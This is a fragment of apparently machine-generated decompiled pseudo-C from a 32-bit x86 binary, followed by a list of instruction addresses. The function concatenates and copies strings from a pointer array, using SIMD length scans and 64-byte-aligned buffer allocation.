				signed int _t374;
				signed int* _t376;
				signed int _t377;
				signed int _t378;
				intOrPtr* _t380;
				intOrPtr* _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				intOrPtr* _t386;
				void* _t387;
				signed int _t388;
				intOrPtr* _t390;
				unsigned int _t396;
				signed int _t398;
				void* _t399;
				signed int _t400;
				signed int _t401;
				intOrPtr _t402;
				signed int _t403;
				signed int _t404;
				signed int _t407;
				signed int _t414;
				signed int _t415;
				signed int _t422;
				signed int _t428;
				signed int _t429;
				unsigned int _t434;
				signed int _t437;
				void* _t439;
				void* _t441;

				_t439 = (_t437 & 0xfffffff0) - 0x34;
				_t390 = __ecx;
				_t303 =  *__ecx;
				if(_t303 != 0) {
					_t343 =  *( *( *(__ecx + 4)));
					__eflags = _t343;
					if(_t343 == 0) {
						L35:
						_push(0x40);
						_t284 = E003B1030();
						_t439 = _t439 + 4;
						__eflags =  *_t390 - 1;
						 *_t284 = 0;
						if( *_t390 <= 1) {
							goto L203;
						} else {
							_t415 = 0x40;
							goto L37;
						}
					} else {
						__eflags =  *_t343;
						if( *_t343 == 0) {
							goto L35;
						} else {
							_t262 = _t343 & 0x0000000f;
							__eflags = _t262;
							if(_t262 == 0) {
								L16:
								asm("pxor xmm0, xmm0");
								_t294 =  ~( ~_t262 + 0x0000000f & 0x0000000f) + 0x7fffffff;
								__eflags = _t294;
								_v64 = _t294;
								_t429 = _t294;
								while(1) {
									asm("movdqu xmm1, [edx+eax]");
									asm("pcmpeqb xmm1, xmm0");
									asm("pmovmskb ebx, xmm1");
									__eflags = _t294;
									if(_t294 != 0) {
										break;
									}
									_t262 = _t262 + 0x10;
									__eflags = _t262 - _t429;
									if(_t262 < _t429) {
										continue;
									} else {
										_v64 = _t429;
										__eflags = _v64 - 0x7fffffff;
										if(_v64 >= 0x7fffffff) {
											L23:
											_v64 = 0x7fffffff;
										} else {
											_t275 = _t429;
											while(1) {
												__eflags =  *((char*)(_t275 + _t343));
												if( *((char*)(_t275 + _t343)) == 0) {
													break;
												}
												_t275 = _t275 + 1;
												__eflags = _t275 - 0x7fffffff;
												if(_t275 < 0x7fffffff) {
													continue;
												} else {
													goto L23;
												}
												goto L24;
											}
											_v64 = _t275;
										}
									}
									goto L24;
								}
								asm("bsf ebx, ebx");
								_v64 = _t294 + _t262;
							} else {
								_v64 = 0;
								_t299 = _v64;
								_t262 =  ~_t262 + 0x10;
								__eflags = _t262;
								while(1) {
									__eflags =  *((char*)(_t299 + _t343));
									if( *((char*)(_t299 + _t343)) == 0) {
										break;
									}
									_t299 = _t299 + 1;
									__eflags = _t299 - _t262;
									if(_t299 < _t262) {
										continue;
									} else {
										goto L16;
									}
									goto L24;
								}
								_v64 = _t299;
							}
							L24:
							_t264 = _v64 + 1;
							__eflags = _t264 - 0x40;
							_t265 =  <=  ? 0x40 : _t264;
							__eflags = _t265;
							if(_t265 > 0) {
								_t434 = (_t265 >> 5 >> 0x1a) + _t265 >> 6;
								_t266 = _t265 & 0x8000003f;
								__eflags = _t266;
								if(_t266 < 0) {
									_t266 = (_t266 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t266;
								}
								__eflags = _t266;
								_t415 = _t434 + (0 | _t266 > 0x00000000) << 6;
								_push(_t415);
								_v68 = _t343;
								_t269 = E003B1030();
								_t385 = _v68;
								_t339 = _t269;
								_t439 = _t439 + 4;
								_v60 = 0;
								_v44 = _t339;
								_v36 = _t390;
								 *_t339 = 0;
								_v68 =  *_t390;
								_t298 = _v60;
								_t404 = _v64;
								while(1) {
									_t271 =  *_t385;
									_t298 = _t298 + 1;
									 *_t339 = _t271;
									__eflags = _t404;
									if(_t404 == 0) {
										goto L33;
									}
									__eflags = _t298 - _t404;
									if(_t298 == _t404) {
										_t284 = _v44;
										_t272 = _v68;
										_t390 = _v36;
										_t339[0] = 0;
									} else {
										goto L33;
									}
									L206:
									__eflags = _t272 - 1;
									if(_t272 > 1) {
										goto L37;
									} else {
										goto L157;
									}
									goto L200;
									L33:
									__eflags = _t271;
									if(_t271 == 0) {
										_t284 = _v44;
										_t272 = _v68;
										_t390 = _v36;
									} else {
										_t339 =  &(_t339[0]);
										_t385 = _t385 + 1;
										__eflags = _t385;
										continue;
									}
									goto L206;
								}
							} else {
								_t284 = 0;
								__eflags = _t303 - 1;
								if(_t303 <= 1) {
									L203:
									_t344 = _a4;
									_t203 = 0;
									 *_t344 = 0;
									 *((intOrPtr*)(_t344 + 4)) = 0;
									__eflags = _t284;
									if(_t284 == 0) {
										goto L191;
									} else {
										goto L158;
									}
								} else {
									_t415 = 0;
									L37:
									_t36 =  &_a8; // 0x3d3877
									_t308 =  *_t36 & 0x0000000f;
									asm("pxor xmm0, xmm0");
									_t359 =  ~_t308 + 0x10;
									__eflags = _t359;
									_v52 = _t359;
									_v56 = _t308;
									_v48 = _t415;
									_v36 = _t390;
									_t400 = 1;
									goto L38;
									do {
										do {
											do {
												L38:
												__eflags = _a8;
												if(_a8 != 0) {
													_t363 = _a8;
													__eflags =  *_t363;
													if( *_t363 != 0) {
														__eflags = _t284 - _a8;
														if(_t284 != _a8) {
															_t229 = _v56;
															__eflags = _t229;
															if(_t229 == 0) {
																L46:
																asm("pxor xmm1, xmm1");
																_t422 =  ~( ~_t229 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																__eflags = _t422;
																while(1) {
																	asm("movdqu xmm0, [ecx+eax]");
																	asm("pcmpeqb xmm0, xmm1");
																	asm("pmovmskb edx, xmm0");
																	__eflags = _t363;
																	if(_t363 != 0) {
																		break;
																	}
																	_t229 = _t229 + 0x10;
																	__eflags = _t229 - _t422;
																	if(_t229 < _t422) {
																		continue;
																	} else {
																		__eflags = _t422 - 0x7fffffff;
																		if(_t422 >= 0x7fffffff) {
																			L53:
																			_t422 = 0x7fffffff;
																		} else {
																			_t363 = _a8;
																			while(1) {
																				__eflags =  *((char*)(_t422 + _t363));
																				if( *((char*)(_t422 + _t363)) == 0) {
																					goto L54;
																				}
																				_t422 = _t422 + 1;
																				__eflags = _t422 - 0x7fffffff;
																				if(_t422 < 0x7fffffff) {
																					continue;
																				} else {
																					goto L53;
																				}
																				goto L54;
																			}
																		}
																	}
																	goto L54;
																}
																asm("bsf esi, edx");
																_t422 = _t422 + _t229;
															} else {
																_t229 = _v52;
																_t422 = 0;
																__eflags = 0;
																_t324 = _a8;
																_t363 = _t229;
																while(1) {
																	__eflags =  *((char*)(_t422 + _t324));
																	if( *((char*)(_t422 + _t324)) == 0) {
																		break;
																	}
																	_t422 = _t422 + 1;
																	__eflags = _t422 - _t363;
																	if(_t422 < _t363) {
																		continue;
																	} else {
																		_v52 = _t363;
																		goto L46;
																	}
																	goto L54;
																}
																_v52 = _t363;
															}
															L54:
															__eflags = _t284;
															if(_t284 == 0) {
																_t311 = 0;
															} else {
																_t239 = _t284 & 0x0000000f;
																__eflags = _t239;
																if(_t239 == 0) {
																	L59:
																	asm("pxor xmm1, xmm1");
																	_t311 =  ~( ~_t239 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																	__eflags = _t311;
																	while(1) {
																		asm("movdqu xmm0, [ebx+eax]");
																		asm("pcmpeqb xmm0, xmm1");
																		asm("pmovmskb edx, xmm0");
																		__eflags = _t363;
																		if(_t363 != 0) {
																			break;
																		}
																		_t239 = _t239 + 0x10;
																		__eflags = _t239 - _t311;
																		if(_t239 < _t311) {
																			continue;
																		} else {
																			__eflags = _t311 - 0x7fffffff;
																			if(_t311 >= 0x7fffffff) {
																				L65:
																				_t311 = 0x7fffffff;
																			} else {
																				while(1) {
																					__eflags =  *((char*)(_t311 + _t284));
																					if( *((char*)(_t311 + _t284)) == 0) {
																						goto L66;
																					}
																					_t311 = _t311 + 1;
																					__eflags = _t311 - 0x7fffffff;
																					if(_t311 < 0x7fffffff) {
																						continue;
																					} else {
																						goto L65;
																					}
																					goto L66;
																				}
																			}
																		}
																		goto L66;
																	}
																	asm("bsf ecx, edx");
																	_t311 = _t311 + _t239;
																} else {
																	_t311 = 0;
																	_t239 =  ~_t239 + 0x10;
																	__eflags = _t239;
																	while(1) {
																		__eflags =  *((char*)(_t311 + _t284));
																		if( *((char*)(_t311 + _t284)) == 0) {
																			goto L66;
																		}
																		_t311 = _t311 + 1;
																		__eflags = _t311 - _t239;
																		if(_t311 < _t239) {
																			continue;
																		} else {
																			goto L59;
																		}
																		goto L66;
																	}
																}
															}
															L66:
															_t55 = _t311 + 1; // 0x80000000
															_t312 = _t422 + _t55;
															__eflags = _t312;
															if(_t312 != 0) {
																__eflags = _t312 - 0x40;
																_t313 =  <=  ? 0x40 : _t312;
																__eflags = _t313 - _v48;
																if(_t313 > _v48) {
																	goto L71;
																}
																goto L83;
															} else {
																__eflags = _t284;
																if(_t284 == 0) {
																	__eflags = _v48 - 0x40;
																	if(_v48 >= 0x40) {
																		goto L97;
																	} else {
																		goto L213;
																	}
																	goto L225;
																} else {
																	 *_t284 = 0;
																	_t365 = 0;
																	__eflags = _v48 - 0x40;
																	if(_v48 < 0x40) {
																		L213:
																		_t313 = 0x40;
																		L71:
																		_t372 = (_t313 >> 5 >> 0x1a) + _t313 >> 6;
																		_v48 = _t372;
																		_t315 = _t313 & 0x8000003f;
																		__eflags = _t315;
																		if(_t315 < 0) {
																			_t315 = (_t315 - 0x00000001 | 0xffffffc0) + 1;
																			__eflags = _t315;
																		}
																		__eflags = _t315;
																		_t374 = _t372 + (0 | _t315 > 0x00000000) << 6;
																		_v48 = _t374;
																		_push(_t374);
																		_t234 = E003B1030();
																		_v68 = _t234;
																		_t439 = _t439 + 4;
																		__eflags = _t284;
																		if(_t284 == 0) {
																			 *_t234 = 0;
																		} else {
																			__eflags = _v68;
																			if(_v68 != 0) {
																				_t376 = _t234;
																				_t236 =  *_t284;
																				 *_t376 = _t236;
																				__eflags = _t236;
																				if(_t236 != 0) {
																					_v32 = _t400;
																					_t237 = 0;
																					__eflags = 0;
																					_t316 = _t376;
																					while(1) {
																						_t237 = _t237 + 1;
																						_t377 =  *((char*)(_t284 + _t237 * 2 - 1));
																						 *(_t316 + _t237 * 2 - 1) = _t377;
																						__eflags = _t377;
																						if(_t377 == 0) {
																							break;
																						}
																						_t378 =  *((char*)(_t284 + _t237 * 2));
																						 *(_t316 + _t237 * 2) = _t378;
																						__eflags = _t378;
																						if(_t378 != 0) {
																							continue;
																						}
																						break;
																					}
																					_t400 = _v32;
																				}
																			}
																			_push(1);
																			_push(_t284);
																			E003B10B0();
																			_t439 = _t439 + 8;
																		}
																		_t284 = _v68;
																		L83:
																		_t314 = _t284;
																		__eflags = _t284;
																		if(_t284 != 0) {
																			_t365 =  *_t284;
																			goto L85;
																		}
																	} else {
																		_t314 = _t284;
																		L85:
																		__eflags = _t365;
																		if(_t365 != 0) {
																			_t367 = 0;
																			__eflags = 0;
																			while(1) {
																				_t367 = _t367 + 1;
																				_t231 = _t284 + _t367 * 2;
																				__eflags =  *(_t231 - 1);
																				_t78 = _t231 - 1; // -1
																				_t314 = _t78;
																				if( *(_t231 - 1) == 0) {
																					goto L89;
																				}
																				_t314 = _t231;
																				__eflags =  *_t231;
																				if( *_t231 != 0) {
																					continue;
																				}
																				goto L89;
																			}
																		}
																		L89:
																		_t366 = _t314;
																		__eflags = _t422;
																		if(__eflags != 0) {
																			if(__eflags > 0) {
																				goto L92;
																			}
																		} else {
																			_t422 = 0x7fffffff;
																			L92:
																			_v32 = _t400;
																			_t230 = 0;
																			__eflags = 0;
																			_v44 = _t284;
																			_t401 = _a8;
																			while(1) {
																				_t287 =  *((char*)(_t230 + _t401));
																				 *(_t230 + _t366) = _t287;
																				__eflags = _t287;
																				if(_t287 == 0) {
																					break;
																				}
																				_t85 = _t366 + 1; // 0x1
																				_t314 = _t230 + _t85;
																				_t230 = _t230 + 1;
																				__eflags = _t230 - _t422;
																				if(_t230 < _t422) {
																					continue;
																				}
																				break;
																			}
																			_t400 = _v32;
																			_t284 = _v44;
																		}
																		 *_t314 = 0;
																	}
																}
															}
														}
													}
												}
												L97:
												_t309 =  *(_v36 + 4);
												_t361 =  *( *(_t309 + _t400 * 4));
												__eflags = _t361;
												if(_t361 == 0) {
													goto L99;
												} else {
													__eflags =  *_t361;
													if( *_t361 != 0) {
														__eflags = _t361 - _t284;
														if(_t361 == _t284) {
															goto L99;
														} else {
															_t225 = _t361 & 0x0000000f;
															__eflags = _t225;
															if(_t225 == 0) {
																L106:
																asm("pxor xmm1, xmm1");
																_t428 =  ~( ~_t225 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																__eflags = _t428;
																while(1) {
																	asm("movdqu xmm0, [edx+eax]");
																	asm("pcmpeqb xmm0, xmm1");
																	asm("pmovmskb ecx, xmm0");
																	__eflags = _t309;
																	if(_t309 != 0) {
																		break;
																	}
																	_t225 = _t225 + 0x10;
																	__eflags = _t225 - _t428;
																	if(_t225 < _t428) {
																		continue;
																	} else {
																		__eflags = _t428 - 0x7fffffff;
																		if(_t428 >= 0x7fffffff) {
																			L112:
																			_t428 = 0x7fffffff;
																		} else {
																			while(1) {
																				__eflags =  *((char*)(_t428 + _t361));
																				if( *((char*)(_t428 + _t361)) == 0) {
																					goto L113;
																				}
																				_t428 = _t428 + 1;
																				__eflags = _t428 - 0x7fffffff;
																				if(_t428 < 0x7fffffff) {
																					continue;
																				} else {
																					goto L112;
																				}
																				goto L113;
																			}
																		}
																	}
																	goto L113;
																}
																asm("bsf esi, ecx");
																_t428 = _t428 + _t225;
															} else {
																_t428 = 0;
																_t225 =  ~_t225 + 0x10;
																__eflags = _t225;
																while(1) {
																	__eflags =  *((char*)(_t428 + _t361));
																	if( *((char*)(_t428 + _t361)) == 0) {
																		goto L113;
																	}
																	_t428 = _t428 + 1;
																	__eflags = _t428 - _t225;
																	if(_t428 < _t225) {
																		continue;
																	} else {
																		goto L106;
																	}
																	goto L113;
																}
															}
															L113:
															__eflags = _t284;
															if(_t284 == 0) {
																_t226 = 0;
															} else {
																_t337 = _t284 & 0x0000000f;
																__eflags = _t337;
																if(_t337 == 0) {
																	L118:
																	asm("pxor xmm1, xmm1");
																	_v32 = _t400;
																	_t226 =  ~( ~_t337 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																	__eflags = _t226;
																	while(1) {
																		asm("movdqu xmm0, [ebx+ecx]");
																		asm("pcmpeqb xmm0, xmm1");
																		asm("pmovmskb edi, xmm0");
																		__eflags = _t400;
																		if(_t400 != 0) {
																			break;
																		}
																		_t337 = _t337 + 0x10;
																		__eflags = _t337 - _t226;
																		if(_t337 < _t226) {
																			continue;
																		} else {
																			_t400 = _v32;
																			__eflags = _t226 - 0x7fffffff;
																			if(_t226 >= 0x7fffffff) {
																				L124:
																				_t226 = 0x7fffffff;
																			} else {
																				while(1) {
																					__eflags =  *((char*)(_t226 + _t284));
																					if( *((char*)(_t226 + _t284)) == 0) {
																						goto L125;
																					}
																					_t226 = _t226 + 1;
																					__eflags = _t226 - 0x7fffffff;
																					if(_t226 < 0x7fffffff) {
																						continue;
																					} else {
																						goto L124;
																					}
																					goto L125;
																				}
																			}
																		}
																		goto L125;
																	}
																	_t259 = _t400;
																	asm("bsf eax, eax");
																	_t400 = _v32;
																	_t226 = _t259 + _t337;
																} else {
																	_t226 = 0;
																	_t337 =  ~_t337 + 0x10;
																	__eflags = _t337;
																	while(1) {
																		__eflags =  *((char*)(_t226 + _t284));
																		if( *((char*)(_t226 + _t284)) == 0) {
																			goto L125;
																		}
																		_t226 = _t226 + 1;
																		__eflags = _t226 - _t337;
																		if(_t226 < _t337) {
																			continue;
																		} else {
																			goto L118;
																		}
																		goto L125;
																	}
																}
															}
															L125:
															_t100 = _t226 + 1; // 0x80000000
															_t227 = _t428 + _t100;
															__eflags = _t227;
															if(_t227 != 0) {
																__eflags = _t227 - 0x40;
																_t228 =  <=  ? 0x40 : _t227;
																__eflags = _t228 - _v48;
																if(_t228 > _v48) {
																	goto L130;
																}
																goto L142;
															} else {
																__eflags = _t284;
																if(_t284 == 0) {
																	__eflags = _v48 - 0x40;
																	if(_v48 >= 0x40) {
																		goto L214;
																	} else {
																		goto L224;
																	}
																} else {
																	 *_t284 = 0;
																	_t242 = 0;
																	__eflags = _v48 - 0x40;
																	if(_v48 < 0x40) {
																		L224:
																		_t228 = 0x40;
																		L130:
																		_t331 = (_t228 >> 5 >> 0x1a) + _t228 >> 6;
																		_v48 = _t331;
																		_t245 = _t228 & 0x8000003f;
																		__eflags = _t245;
																		if(_t245 < 0) {
																			_t245 = (_t245 - 0x00000001 | 0xffffffc0) + 1;
																			__eflags = _t245;
																		}
																		__eflags = _t245;
																		_t333 = _t331 + (0 | _t245 > 0x00000000) << 6;
																		_v48 = _t333;
																		_push(_t333);
																		_v64 = _t361;
																		_t248 = E003B1030();
																		_t361 = _v64;
																		_v60 = _t248;
																		_t439 = _t439 + 4;
																		__eflags = _t284;
																		if(_t284 == 0) {
																			 *_t248 = 0;
																		} else {
																			__eflags = _v60;
																			if(_v60 != 0) {
																				_t335 = _t248;
																				_t250 =  *_t284;
																				 *_t335 = _t250;
																				__eflags = _t250;
																				if(_t250 != 0) {
																					_v64 = _t361;
																					_t251 = 0;
																					__eflags = 0;
																					_v32 = _t400;
																					while(1) {
																						_t251 = _t251 + 1;
																						_t383 =  *((char*)(_t284 + _t251 * 2 - 1));
																						 *(_t335 + _t251 * 2 - 1) = _t383;
																						__eflags = _t383;
																						if(_t383 == 0) {
																							break;
																						}
																						_t384 =  *((char*)(_t284 + _t251 * 2));
																						 *(_t335 + _t251 * 2) = _t384;
																						__eflags = _t384;
																						if(_t384 != 0) {
																							continue;
																						}
																						break;
																					}
																					_t361 = _v64;
																					_t400 = _v32;
																				}
																			}
																			_push(1);
																			_push(_t284);
																			_v64 = _t361;
																			E003B10B0();
																			_t361 = _v64;
																			_t439 = _t439 + 8;
																		}
																		_t284 = _v60;
																		L142:
																		_t326 = _t284;
																		__eflags = _t284;
																		if(_t284 == 0) {
																			goto L214;
																		} else {
																			_t242 =  *_t284;
																			goto L144;
																		}
																	} else {
																		_t326 = _t284;
																		L144:
																		__eflags = _t242;
																		if(_t242 != 0) {
																			_v32 = _t400;
																			_t244 = 0;
																			__eflags = 0;
																			while(1) {
																				_t244 = _t244 + 1;
																				_t403 = _t284 + _t244 * 2;
																				__eflags =  *(_t403 - 1);
																				_t326 = _t403 - 1;
																				if( *(_t403 - 1) == 0) {
																					break;
																				}
																				_t326 = _t403;
																				__eflags =  *_t403;
																				if( *_t403 != 0) {
																					continue;
																				}
																				break;
																			}
																			_t400 = _v32;
																		}
																		_t243 = _t326;
																		__eflags = _t428;
																		if(__eflags != 0) {
																			if(__eflags > 0) {
																				goto L152;
																			}
																		} else {
																			_t428 = 0x7fffffff;
																			L152:
																			_v40 = 0;
																			_v32 = _t400;
																			_v44 = _t284;
																			_t402 = _v40;
																			while(1) {
																				_t288 =  *((char*)(_t402 + _t361));
																				 *(_t402 + _t243) = _t288;
																				__eflags = _t288;
																				if(_t288 == 0) {
																					break;
																				}
																				_t141 = _t243 + 1; // 0x1
																				_t326 = _t402 + _t141;
																				_t402 = _t402 + 1;
																				__eflags = _t402 - _t428;
																				if(_t402 < _t428) {
																					continue;
																				}
																				break;
																			}
																			_t400 = _v32;
																			_t284 = _v44;
																		}
																		goto L156;
																	}
																}
															}
														}
													} else {
														goto L99;
													}
												}
												goto L200;
												L99:
												_t400 = _t400 + 1;
												__eflags = _t400 -  *_v36;
											} while (_t400 <  *_v36);
											goto L203;
											L214:
											_t400 = _t400 + 1;
											__eflags = _t400 -  *_v36;
										} while (_t400 <  *_v36);
										_t380 = _a4;
										 *_t380 = 0;
										 *((intOrPtr*)(_t380 + 4)) = 0;
										L191:
										_push(0x40);
										_t407 = E003B1030();
										_t439 = _t439 + 4;
										_t206 =  *_a4;
										__eflags = _t206;
										if(_t206 == 0) {
											 *_t407 = 0;
										} else {
											__eflags = _t407;
											if(_t407 != 0) {
												_t345 =  *_t206;
												 *_t407 = _t345;
												__eflags = _t345;
												if(_t345 != 0) {
													_t304 = 0;
													__eflags = 0;
													while(1) {
														_t304 = _t304 + 1;
														_t346 =  *((char*)(_t206 + _t304 * 2 - 1));
														 *(_t407 + _t304 * 2 - 1) = _t346;
														__eflags = _t346;
														if(_t346 == 0) {
															goto L197;
														}
														_t347 =  *((char*)(_t206 + _t304 * 2));
														 *(_t407 + _t304 * 2) = _t347;
														__eflags = _t347;
														if(_t347 != 0) {
															continue;
														}
														goto L197;
													}
												}
											}
											L197:
											_push(1);
											_push(_t206);
											E003B10B0();
											_t439 = _t439 + 8;
										}
										_t207 = _a4;
										 *_t207 = _t407;
										_t207[1] = 0x40;
										goto L200;
										L156:
										_t400 = _t400 + 1;
										 *_t326 = 0;
										__eflags = _t400 -  *_v36;
									} while (_t400 <  *_v36);
									L157:
									_t382 = _a4;
									_t203 = 0;
									__eflags = 0;
									 *_t382 = 0;
									 *((intOrPtr*)(_t382 + 4)) = 0;
									L158:
									__eflags =  *_t284;
									if( *_t284 == 0) {
										goto L191;
									} else {
										_t349 = _t284 & 0x0000000f;
										__eflags = _t349;
										if(_t349 == 0) {
											L163:
											asm("pxor xmm0, xmm0");
											_t414 =  ~( ~_t349 + 0x0000000f & 0x0000000f) + 0x7fffffff;
											__eflags = _t414;
											while(1) {
												asm("movdqu xmm1, [ebx+edx]");
												asm("pcmpeqb xmm1, xmm0");
												asm("pmovmskb eax, xmm1");
												__eflags = _t203;
												if(_t203 != 0) {
													break;
												}
												_t349 = _t349 + 0x10;
												__eflags = _t349 - _t414;
												if(_t349 < _t414) {
													continue;
												} else {
													__eflags = _t414 - 0x7fffffff;
													if(_t414 >= 0x7fffffff) {
														L169:
														_t414 = 0x7fffffff;
													} else {
														while(1) {
															__eflags =  *((char*)(_t414 + _t284));
															if( *((char*)(_t414 + _t284)) == 0) {
																goto L170;
															}
															_t414 = _t414 + 1;
															__eflags = _t414 - 0x7fffffff;
															if(_t414 < 0x7fffffff) {
																continue;
															} else {
																goto L169;
															}
															goto L170;
														}
													}
												}
												goto L170;
											}
											asm("bsf esi, eax");
											_t414 = _t414 + _t349;
										} else {
											_t414 = 0;
											_t349 =  ~_t349 + 0x10;
											__eflags = _t349;
											while(1) {
												__eflags =  *((char*)(_t414 + _t284));
												if( *((char*)(_t414 + _t284)) == 0) {
													goto L170;
												}
												_t414 = _t414 + 1;
												__eflags = _t414 - _t349;
												if(_t414 < _t349) {
													continue;
												} else {
													goto L163;
												}
												goto L170;
											}
										}
										L170:
										_t149 = _t414 + 1; // 0x80000000
										_t350 = _t149;
										__eflags = _t350 - 0x40;
										_t351 =  <=  ? 0x40 : _t350;
										__eflags = _t351;
										if(_t351 > 0) {
											_t396 = (_t351 >> 5 >> 0x1a) + _t351 >> 6;
											_t352 = _t351 & 0x8000003f;
											__eflags = _t352;
											if(_t352 < 0) {
												_t352 = (_t352 - 0x00000001 | 0xffffffc0) + 1;
												__eflags = _t352;
											}
											__eflags = _t352;
											_t398 = _t396 + (0 | _t352 > 0x00000000) << 6;
											_push(_t398);
											_t353 = E003B1030();
											_t439 = _t439 + 4;
											_t305 =  *_a4;
											__eflags = _t305;
											if(_t305 == 0) {
												 *_t353 = 0;
											} else {
												__eflags = _t353;
												if(_t353 != 0) {
													_t219 =  *_t305;
													 *_t353 = _t219;
													__eflags = _t219;
													if(_t219 != 0) {
														__eflags = 0;
														_v68 = _t414;
														_v44 = _t284;
														_t286 = 0;
														while(1) {
															_t286 = _t286 + 1;
															_t221 =  *((char*)(_t305 + _t286 * 2 - 1));
															 *(_t353 + _t286 * 2 - 1) = _t221;
															__eflags = _t221;
															if(_t221 == 0) {
																break;
															}
															_t222 =  *((char*)(_t305 + _t286 * 2));
															 *(_t353 + _t286 * 2) = _t222;
															__eflags = _t222;
															if(_t222 != 0) {
																continue;
															}
															break;
														}
														_t414 = _v68;
														_t284 = _v44;
													}
												}
												_push(1);
												_push(_t305);
												_v68 = _t353;
												E003B10B0();
												_t353 = _v68;
												_t439 = _t439 + 8;
											}
											_t216 = _a4;
											_t216[1] = _t398;
											 *_t216 = _t353;
										} else {
											_t353 = 0;
										}
										_t306 = _t284;
										__eflags = _t353;
										if(_t353 != 0) {
											_t399 = 0;
											while(1) {
												_t217 =  *_t306;
												_t399 = _t399 + 1;
												 *_t353 = _t217;
												__eflags = _t414;
												if(_t414 == 0) {
													goto L189;
												}
												__eflags = _t399 - _t414;
												if(_t399 == _t414) {
													 *(_t353 + 1) = 0;
												} else {
													goto L189;
												}
												goto L200;
												L189:
												__eflags = _t217;
												if(_t217 != 0) {
													_t353 = _t353 + 1;
													_t306 = _t306 + 1;
													__eflags = _t306;
													continue;
												}
												goto L200;
											}
										}
									}
								}
							}
						}
					}
					L200:
					_push(1);
					_push(_t284);
					E003B10B0();
					return _a4;
				} else {
					_t386 = _a4;
					_push(0x40);
					 *_t386 = 0;
					 *((intOrPtr*)(_t386 + 4)) = 0;
					_t300 = E003B1030();
					_t441 = _t439 + 4;
					_t280 =  *_a4;
					if(_t280 == 0) {
						 *_t300 = 0;
					} else {
						if(_t300 != 0) {
							_t387 =  *_t280;
							 *_t300 = _t387;
							if(_t387 != 0) {
								_t388 = 0;
								while(1) {
									_t388 = _t388 + 1;
									_t340 =  *((char*)(_t280 + _t388 * 2 - 1));
									 *((char*)(_t300 + _t388 * 2 - 1)) = _t340;
									if(_t340 == 0) {
										goto L7;
									}
									_t341 =  *((char*)(_t280 + _t388 * 2));
									 *((char*)(_t300 + _t388 * 2)) = _t341;
									if(_t341 != 0) {
										continue;
									}
									goto L7;
								}
							}
						}
						L7:
						_push(1);
						_push(_t280);
						E003B10B0();
						_t441 = _t441 + 8;
					}
					_t281 = _a4;
					_t281[1] = 0x40;
					 *_t281 = _t300;
					return _t281;
				}
				L225:
			}

0x003c7669
0x003c766c
0x003c766e
0x003c7672
0x003c76e8
0x003c76ea
0x003c76ec
0x003c782b
0x003c782b
0x003c7832
0x003c7834
0x003c7837
0x003c783a
0x003c783d
0x00000000
0x003c7843
0x003c7843
0x00000000
0x003c7843
0x003c76f2
0x003c76f2
0x003c76f5
0x00000000
0x003c76fb
0x003c76fd
0x003c76fd
0x003c7700
0x003c7722
0x003c7726
0x003c7732
0x003c7732
0x003c7738
0x003c773c
0x003c773e
0x003c773e
0x003c7743
0x003c7747
0x003c774b
0x003c774d
0x00000000
0x00000000
0x003c7753
0x003c7756
0x003c7758
0x00000000
0x003c775a
0x003c775a
0x003c775e
0x003c7766
0x003c777c
0x003c777c
0x003c7768
0x003c7768
0x003c776a
0x003c776a
0x003c776e
0x00000000
0x00000000
0x003c7774
0x003c7775
0x003c777a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c777a
0x003c7f0c
0x003c7f0c
0x003c7766
0x00000000
0x003c7758
0x003c7f15
0x003c7f1a
0x003c7702
0x003c7702
0x003c770c
0x003c7710
0x003c7710
0x003c7713
0x003c7713
0x003c7717
0x00000000
0x00000000
0x003c771d
0x003c771e
0x003c7720
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c7720
0x003c7f23
0x003c7f23
0x003c7784
0x003c778d
0x003c7790
0x003c7793
0x003c7796
0x003c7798
0x003c77b6
0x003c77b9
0x003c77b9
0x003c77be
0x003c77c6
0x003c77c6
0x003c77c6
0x003c77c7
0x003c77d3
0x003c77d6
0x003c77d7
0x003c77db
0x003c77e0
0x003c77e4
0x003c77e6
0x003c77ed
0x003c77f5
0x003c77f9
0x003c77fd
0x003c7800
0x003c7803
0x003c7807
0x003c780f
0x003c780f
0x003c7812
0x003c7813
0x003c7815
0x003c7817
0x00000000
0x00000000
0x003c7819
0x003c781b
0x003c7ee2
0x003c7ee6
0x003c7ee9
0x003c7eed
0x00000000
0x00000000
0x00000000
0x003c7ef1
0x003c7ef1
0x003c7ef4
0x00000000
0x003c7efa
0x00000000
0x003c7efa
0x00000000
0x003c7821
0x003c7821
0x003c7823
0x003c7eff
0x003c7f03
0x003c7f06
0x003c7829
0x003c780d
0x003c780e
0x003c780e
0x00000000
0x003c780e
0x00000000
0x003c7823
0x003c779a
0x003c779a
0x003c779c
0x003c779f
0x003c7ecb
0x003c7ecb
0x003c7ece
0x003c7ed0
0x003c7ed2
0x003c7ed5
0x003c7ed7
0x00000000
0x003c7edd
0x00000000
0x003c7edd
0x003c77a5
0x003c77a5
0x003c7848
0x003c7848
0x003c7850
0x003c7855
0x003c785b
0x003c785b
0x003c785e
0x003c7862
0x003c7866
0x003c786a
0x003c786e
0x003c786e
0x003c7870
0x003c7870
0x003c7870
0x003c7870
0x003c7870
0x003c7874
0x003c787a
0x003c787d
0x003c7880
0x003c7886
0x003c7889
0x003c788f
0x003c7893
0x003c7895
0x003c78b5
0x003c78b9
0x003c78c8
0x003c78c8
0x003c78ce
0x003c78ce
0x003c78d3
0x003c78d7
0x003c78db
0x003c78dd
0x00000000
0x00000000
0x003c78e3
0x003c78e6
0x003c78e8
0x00000000
0x003c78ea
0x003c78ea
0x003c78f0
0x003c7904
0x003c7904
0x003c78f2
0x003c78f2
0x003c78f5
0x003c78f5
0x003c78f9
0x00000000
0x00000000
0x003c78fb
0x003c78fc
0x003c7902
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c7902
0x003c78f5
0x003c78f0
0x00000000
0x003c78e8
0x003c7f8f
0x003c7f92
0x003c7897
0x003c7897
0x003c789b
0x003c789b
0x003c789d
0x003c78a0
0x003c78a2
0x003c78a2
0x003c78a6
0x00000000
0x00000000
0x003c78ac
0x003c78ad
0x003c78af
0x00000000
0x003c78b1
0x003c78b1
0x00000000
0x003c78b1
0x00000000
0x003c78af
0x003c7f99
0x003c7f99
0x003c7909
0x003c7909
0x003c790b
0x003c7f88
